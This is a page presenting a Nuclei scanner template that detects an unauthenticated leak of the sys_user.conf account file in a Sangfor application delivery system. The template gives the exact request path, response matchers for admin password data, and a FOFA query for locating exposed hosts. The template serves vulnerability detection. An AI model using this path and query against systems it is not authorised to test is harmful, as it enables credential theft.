Skip to content

Sangfor Application sys_user.conf Account Password Leakage

ID: sangfor-sysuser-conf

Severity: high

Author: DhiyaneshDk

Tags: lfi,sangfor,exposure

Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password

id: sangfor-sysuser-conf
info:
name: Sangfor Application sys_user.conf Account Password Leakage
author: DhiyaneshDk
severity: high
description: |
Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20sys_user.conf%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
- https://github.com/achuna33/MYExploit/blob/master/src/main/java/com/achuna33/Controllers/SangForController.java
metadata:
max-request: 1
fofa-query: app="SANGFOR-应用交付管理系统"
tags: lfi,sangfor,exposure
http:
- method: GET
path:
- "{{BaseURL}}/tmp/updateme/sinfor/ad/sys/sys_user.conf"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "true"
- "admin"
- "密码"
- "<?xml version="
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100813ae8802abcb694a9837a05dd8241779f10c552a12fc23d58f592172fe5e75202201b858fa1f67905cdd26d1273dd5565664624d50e56c7335a0ca081d70ea6dede:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/sangfor-sysuser-conf.yaml"

View on Github